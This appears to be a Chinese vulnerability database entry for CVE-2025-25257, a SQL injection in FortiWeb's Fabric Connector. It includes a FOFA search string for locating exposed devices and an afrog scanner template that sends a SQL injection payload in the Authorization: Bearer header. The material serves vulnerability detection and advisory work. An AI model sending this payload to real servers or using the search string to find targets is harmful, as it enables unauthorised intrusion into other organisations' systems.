Fortinet FortiWeb SQL注入漏洞

漏洞信息

漏洞名称: Fortinet FortiWeb SQL注入漏洞

漏洞编号:

  • CVE: CVE-2025-25257

漏洞类型: SQL注入

漏洞等级: 严重

漏洞描述: Fortinet FortiWeb是一款广泛使用的Web应用防火墙(WAF),旨在保护Web应用免受各种网络攻击,如SQL注入、跨站脚本(XSS)等。它通常部署在企业环境中,用于保护关键Web应用和服务。该产品因其强大的防护能力和易用性而受到许多组织的青睐。

该漏洞存在于FortiWeb Fabric Connector组件中,具体问题在于认证处理过程中未对输入参数进行严格校验。攻击者可以通过在HTTP请求的Authorization: Bearer头中注入恶意SQL语句,利用此漏洞实现远程代码执行,从而获取服务器权限。这种类型的漏洞通常被称为SQL注入漏洞,其根本原因在于应用程序未能正确过滤或转义用户提供的输入,导致攻击者能够操纵后端数据库查询。

此漏洞的安全风险极高,因为它允许攻击者在无需认证的情况下远程执行任意代码,完全控制受影响的服务器。攻击者可以利用此漏洞窃取敏感数据、破坏服务或进一步渗透内网。由于FortiWeb通常用于保护关键业务应用,此漏洞的利用可能导致严重的数据泄露和服务中断,对受影响组织造成重大损失。

产品厂商: Fortinet

产品名称: FortiWeb Fabric Connector

搜索语法: title=”fortiweb - “

来源: https://github.com/zan8in/afrog/blob/5ddc6e231b419ed9d2419bf981ba7b2c4d25ce59/pocs%2Ftemp%2Fafrog-pocs%2Fcve%2FCVE-2025-25257.yaml

类型: zan8in/afrog:github commit

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

id: CVE-2025-25257

info:
name: Fortinet FortiWeb SQL注入漏洞
author: avic123
severity: critical
verified: true
description: |
该漏洞源于Fortinet FortiWeb Fabric Connector 组件在认证处理中没有严格校验输入参数,攻击者可在 Authorization: Bearer 头中注入恶意SQL语句,实现远程代码执行获取服务器权限
fofa:title="fortiweb - "
reference:
- https://mp.weixin.qq.com/s/uX7DFLxlxOdVl0Yc-VHUWg
tags: Fortinet,CVE,CVE-2025-25257,sqli
created: 2025/07/14

rules:
r0:
request:
method: GET
path: /
expression: response.status == 200 && response.body.ibcontains(b"<title>FortiWeb -")
r1:
request:
method: GET
path: /api/fabric/device/status
headers:
Authorization: Bearer 'and('x'='x')union(select(@@global.secure_file_priv));--+-
expression: >-
response.status == 401
expression: r0() && r1()